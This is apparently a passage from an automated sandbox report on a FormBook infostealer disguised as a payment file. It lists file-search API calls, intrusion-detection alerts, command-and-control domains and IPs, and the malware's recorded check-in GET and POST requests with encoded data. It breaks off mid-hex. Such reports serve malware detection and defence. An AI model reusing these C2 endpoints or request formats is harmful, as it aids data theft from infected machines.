                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe; Code function: 0_2_002C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_002C63F9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe; Code function: 0_2_002CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_002CEB60
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe; Code function: 0_2_002CF56F FindFirstFileW,FindClose, 0_2_002CF56F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe; Code function: 0_2_002CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_002CF5FA
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe; Code function: 0_2_002D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_002D1B2F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe; Code function: 0_2_002D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_002D1C8A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe; Code function: 0_2_002D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_002D1F94

                Networking

                Source: Network traffic; Suricata IDS. Rules (all severity 1): 2050745 = ET MALWARE FormBook CnC Checkin (GET) M5; 2855465 = ETPRO MALWARE FormBook CnC Checkin (GET) M2; 2855464 = ETPRO MALWARE FormBook CnC Checkin (POST) M3. Source host 192.168.2.6 and destination port 80 throughout; per destination:
                  161.97.168.245: 2050745 and 2855465 on src port 49777 (no POST check-in alert for this host)
                  27.124.4.246: 2855464 on src ports 49819, 49824, 49831; 2050745 and 2855465 on 49838
                  149.88.81.190: 2855464 on 49858, 49865, 49872; 2050745 and 2855465 on 49878
                  85.159.66.93: 2855464 on 49944, 49950, 49958; 2050745 and 2855465 on 49966
                  185.27.134.144: 2855464 on 49983, 49990, 49997; 2050745 and 2855465 on 50003
                  172.67.145.234: 2855464 on 50006, 50007, 50008; 2050745 and 2855465 on 50009
                  172.67.167.146: 2855464 on 50010, 50011, 50012; 2050745 and 2855465 on 50013
                  154.88.22.101: 2855464 on 50014, 50015, 50016; 2050745 and 2855465 on 50017
                  209.74.77.107: 2855464 on 50019, 50020, 50021; 2050745 and 2855465 on 50022
                  104.21.34.103: 2855464 on 50023, 50025, 50026; 2050745 and 2855465 on 50027
                  20.2.249.7: 2855464 on 50028, 50029, 50030; 2050745 and 2855465 on 50031
                  156.251.17.224: 2855464 on 50032, 50033, 50034; 2050745 and 2855465 on 50035
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: DNS query: www.duwixushx.xyz
                Source: Joe Sandbox ViewIP Address: 185.27.134.144 185.27.134.144
                Source: Joe Sandbox ViewASN Name: SAIC-ASUS SAIC-ASUS
                Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_002D4EB5
                Source: global trafficHTTP traffic detected: GET /xxr1/?6dr=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /sgdd/?6dr=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rq1s/?6dr=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rum2/?6dr=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.amayavp.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /vg0z/?6dr=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vayui.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /o362/?Kp=6N8LUn6pGPW&6dr=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rgenerousrs.storeConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /jhb8/?6dr=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv3IFg7wS9Zfpqa2312nFAQ2OMwXhW64NslbGydbZxuWxpmOq3INM=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t91rl7.proConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /alu5/?Kp=6N8LUn6pGPW&6dr=m83uTjDkEXAXcvpaGmUoJ8Y4XcRIkh2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxo2CL5VTj7SrR/OegDMXRn69R6rST1isaHd8Em6LhDwUu8jHHb1w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.learnwithus.siteConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /1jao/?6dr=wXeCFQWa9OsffQZ2WhWSf1ZyxcnJa4mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM03IMcNL7coNMrr+HJhleldbbhLhSE02VC7Ooq1hKOjwi60t3Eow=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rafconstrutora.onlineConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /n7xy/?6dr=9kSByHmOdk8FUTJoiY9dxdy2O5k/Hm0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNShPDfBTXGcQl1Rn1iXwPoeM4M+DqRn9nIdXP5s7w9IXv4aM6Qswk=&Kp=6N8LUn6pGPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.7vh2wy.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /q0vk/?Kp=6N8LUn6pGPW&6dr=TqE1JZ2PW3JWY2ub7wbyGmkAFORXr7+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU5QjuOQNkNi2JEE5AET6tFv2ZXVhBmCTejYrGfFb1t6Bzh+26W2w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.duwixushx.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.t91rl7.pro
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: global trafficDNS traffic detected: DNS query: www.cuthethoi.online
                Source: global trafficDNS traffic detected: DNS query: www.rafconstrutora.online
                Source: global trafficDNS traffic detected: DNS query: www.7vh2wy.top
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: unknownHTTP traffic detected: POST /sgdd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.laohub10.netOrigin: http://www.laohub10.netReferer: http://www.laohub10.net/sgdd/Cache-Control: no-cacheContent-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 MobileData Raw: 36 64 72 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 34 36 63 61 31 4d 5a 39 73 73 51 66 6c 58 34 69 6a 2f 61 2b 57 44 44 38 76 72 6e 51 68 2f 4a 59 47 78 75 50 78 63 4b 77 47 55 50 Data Ascii: 6dr=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:53:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 27 Nov 2024 07:55:03 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-27T07:55:08.0915773Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNuHMovBEZ%2Bn4NWml1LVp5qOBo5m8swT6H3kMl8%2BA4ZcgInj26eny%2FXEWCtRl0%2BbSaaqMYKUrjZ1rI%2FPCvibsl5teb9X6HHENPrIwx3lttsuN2YUZugFJKT1v0krYDwr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908e497dec4388-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1638&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=746&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NoxhpH51T1yxFOujIFCghAtMu40ZpYJulPcksZgpzYC27g0QtQa91iDPgFY9rXCeVtvVjr07y3SYmFTqniHeE%2BteVMzsxWDv1%2F%2BqTs70%2BAtlyVrK10yIYHKZe3B3o04p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908e5b38e443a7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2033&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fCc2KcmjLsV8PRD2ugtrUvOmlYgXI12iciS4Dsakf1T0Vz61GK8J5F9MwViNSx45p6RJi9hUCQDooJtqGRVoBstbVXME8ADSHLJ%2FIjFWLGcGNaTLsOiqopq4S5%2BtyyF0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908e6bfb8c8cc0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1783&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zsSNk94fbpZn0%2FKtIyaVjlxRad66c1nRYsDOZ9VViVYiLjz%2F8mE3SXCK3j3%2FrX0kxLEJAhhz6SkWaDMUQfEEr7myJC9sj7PScMglQpYTHQ4mD8Kv69j3nKjSiddomww7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908e7caeb34386-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFckI5tGqzTEcjNp4DuYGxsjwG0Nn7U0zbtwrU3rw9xBXIOnEoqMJaGdQsg6sJjMOny38I0pt5EHzqKx1ILVgzfUbYAjCwvKZrFu5QJ6qbyqkaVxhWMd0LwzhXoTO9WZSw9wagab%2Bgs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908ea6df277274-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8WNQR3%2BwwbqUhFmGLUzNgU4Uyt8FoIi12qxV2pbYo7stPG2n4dU%2FMWmtJdUAyDAfL4sjQrukZnX2ZevQT1zFBrCJGO3ieQJWs4K7Q6WN677aPk1jpMZtHghZG5Kyk00obES5m7suPQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908eb75b394289-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1631&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:45 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5X6PjxzMUJt4eqCGYvH08I7r%2BKLtvAX5O9eFP3RqTB4jjjSp56Ddplakrz1PNhssEzG9f21vfgIbuIVmGd6c38DFGJnatYTmQNkrvU2dbhRbeOMqBxnEPhPhLp5WTdEE1EGzw0GfIs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e908ec93be4429a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1733&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1807&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a 